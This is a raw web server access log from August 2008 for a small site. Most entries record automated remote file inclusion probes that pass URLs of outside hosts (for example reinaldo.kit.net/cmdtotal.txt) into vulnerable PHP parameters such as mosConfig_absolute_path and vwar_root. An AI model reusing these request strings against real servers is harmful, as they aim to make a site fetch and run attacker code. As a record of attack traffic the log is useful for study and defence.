210.245.166.92 - - [15/Aug/2008:19:46:34 -0700] "GET //errors.php?error=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:46:41 -0700] "GET /logs/access_080726.log/index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:47:45 -0700] "GET /index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.6.8.125 - - [15/Aug/2008:19:47:46 -0700] "GET /logs/?M=A HTTP/1.0" 200 1208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
88.191.62.117 - - [15/Aug/2008:19:49:08 -0700] "GET /index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
74.6.8.125 - - [15/Aug/2008:19:50:33 -0700] "GET /logs/access_080816.log HTTP/1.0" 200 917504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
74.6.8.125 - - [15/Aug/2008:19:52:43 -0700] "GET /logs/access_080809.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
217.25.160.1 - - [15/Aug/2008:19:53:18 -0700] "GET /logs/access_080726.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:54:32 -0700] "GET /index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.245.166.92 - - [15/Aug/2008:19:54:35 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
69.10.154.65 - - [15/Aug/2008:19:54:49 -0700] "GET /logs/access.log//index.php?pagina=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
69.10.154.65 - - [15/Aug/2008:19:54:49 -0700] "GET //index.php?pagina=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
69.10.154.65 - - [15/Aug/2008:19:54:49 -0700] "GET /logs//index.php?pagina=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
69.10.154.65 - - [15/Aug/2008:19:54:49 -0700] "GET /logs/access_080726.log//index.php?pagina=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
67.225.157.75 - - [15/Aug/2008:19:54:51 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
67.225.157.75 - - [15/Aug/2008:19:54:51 -0700] "GET /logs/access_080726.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.50.28.200 - - [15/Aug/2008:19:54:56 -0700] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://www.fundejus.org//components/com_login/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.getyourselfahorse.com"
74.50.28.200 - - [15/Aug/2008:19:54:56 -0700] "GET /index.php?mosConfig_absolute_path=http://www.fundejus.org//components/com_login/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.getyourselfahorse.com"
74.50.28.200 - - [15/Aug/2008:19:54:57 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.fundejus.org//components/com_login/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.getyourselfahorse.com"
217.25.160.1 - - [15/Aug/2008:19:55:30 -0700] "GET /logs/access_080726.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
74.50.28.200 - - [15/Aug/2008:19:56:38 -0700] "GET /logs/access_080726.log/index.php?mosConfig_absolute_path=http://www.fundejus.org//components/com_login/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.getyourselfahorse.com"
210.245.166.92 - - [15/Aug/2008:19:56:59 -0700] "GET /errors.php?error=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
85.214.72.55 - - [15/Aug/2008:20:00:16 -0700] "GET /logs/access_080809.log//newspublish/samplenewspublish.php?path[docroot]=http://russianinterpreter.ru/administrator/templates/joomla???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:20:02:35 -0700] "GET /logs/access.log//phphost_directoryv2/include/admin.php?rd=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:20:02:35 -0700] "GET //phphost_directoryv2/include/admin.php?rd=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:20:02:35 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:02:37 -0700] "GET /logs/access.log//phphost_directoryv2/include/admin.php?rd=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:20:02:52 -0700] "GET /logs/access_080719.log//atom.php5?page=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:20:02:52 -0700] "GET /logs/access_080719.log//atom.php5?page=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:20:02:53 -0700] "GET /logs/access_080719.log//atom.php5?page=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:20:02:53 -0700] "GET //atom.php5?page=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:20:02:53 -0700] "GET //atom.php5?page=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:20:02:54 -0700] "GET //atom.php5?page=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:20:03:02 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:20:03:03 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:20:03:03 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:20:03:03 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.getyourselfahorse.com"
204.15.10.22 - - [15/Aug/2008:20:03:19 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.getyourselfahorse.com"
204.15.10.22 - - [15/Aug/2008:20:03:19 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:20:03:37 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:20:03:37 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:20:04:27 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:20:04:27 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:20:04:27 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:20:04:27 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:20:05:16 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:20:05:16 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.getyourselfahorse.com"
69.94.30.30 - - [15/Aug/2008:20:05:47 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://yohap.com/links/id??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
69.94.30.30 - - [15/Aug/2008:20:05:47 -0700] "GET /lostpasswd.php?env[include_prefix]=http://yohap.com/links/id??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
69.94.30.30 - - [15/Aug/2008:20:05:47 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://yohap.com/links/id??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:20:05:49 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:20:05:49 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:20:06:31 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:20:06:31 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.getyourselfahorse.com"
67.195.37.163 - - [15/Aug/2008:20:07:10 -0700] "GET /?M=D HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:20:13:20 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:20:13:20 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.getyourselfahorse.com"
69.94.30.30 - - [15/Aug/2008:20:15:44 -0700] "GET /logs/access_080719.log/lostpasswd.php?env[include_prefix]=http://yohap.com/links/id??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:20:17:40 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:20:17:40 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:26:57 -0700] "GET /logs/access_080802.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:26:58 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
69.94.30.30 - - [15/Aug/2008:20:27:56 -0700] "GET /logs/access.log%20/lostpasswd.php?env[include_prefix]=http://yohap.com/links/id??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
129.187.148.244 - - [15/Aug/2008:20:28:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "wwwster/1.4 (Beta, mailto:gue@cis.uni-muenchen.de)" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:29:39 -0700] "GET /logs/access_080802.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:29:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
87.238.163.18 - - [15/Aug/2008:20:36:03 -0700] "GET //?custompluginfile[]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 200 915 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:36:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:37:05 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:20:38:15 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:20:38:15 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:20:38:15 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:20:38:45 -0700] "GET /logs/access_080719.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
87.238.163.18 - - [15/Aug/2008:20:41:45 -0700] "GET /logs/access.log//?custompluginfile[]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
87.238.163.18 - - [15/Aug/2008:20:41:45 -0700] "GET /logs//?custompluginfile[]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 200 1229 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
87.238.163.18 - - [15/Aug/2008:20:43:02 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
87.238.163.18 - - [15/Aug/2008:20:43:03 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:20:45:08 -0700] "GET / HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:20:48:19 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:20:48:20 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:20:48:20 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:20:50:10 -0700] "GET /logs/ HTTP/1.0" 200 1208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:20:50:33 -0700] "GET /logs/access_080726.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
65.55.105.203 - - [15/Aug/2008:20:50:43 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
65.55.105.203 - - [15/Aug/2008:20:50:43 -0700] "GET /logs/scripts.log HTTP/1.1" 200 812711 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:20:50:55 -0700] "GET /?D=A HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:50:56 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
87.238.163.18 - - [15/Aug/2008:20:51:35 -0700] "GET /logs/access_080726.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
87.238.163.18 - - [15/Aug/2008:20:52:06 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:20:53:26 -0700] "GET /logs/access_080816.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:53:26 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:55:18 -0700] "GET /logs/access_080719.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:55:18 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:20:55:19 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:55:35 -0700] "GET /logs/access.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:55:35 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:55:35 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:55:38 -0700] "GET /logs/access.log//announcements.php?phpraid_dir=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:55:39 -0700] "GET //announcements.php?phpraid_dir=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:55:39 -0700] "GET /logs//announcements.php?phpraid_dir=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:57:26 -0700] "GET /logs/access_080802.log//announcements.php?phpraid_dir=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:20:57:26 -0700] "GET //announcements.php?phpraid_dir=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:20:58:05 -0700] "GET /logs/access.log//announcements.php?phpraid_dir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:20:58:06 -0700] "GET //announcements.php?phpraid_dir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:20:58:07 -0700] "GET /logs//announcements.php?phpraid_dir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:20:59:02 -0700] "GET /logs/access.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:20:59:07 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "getyourselfahorse.com"
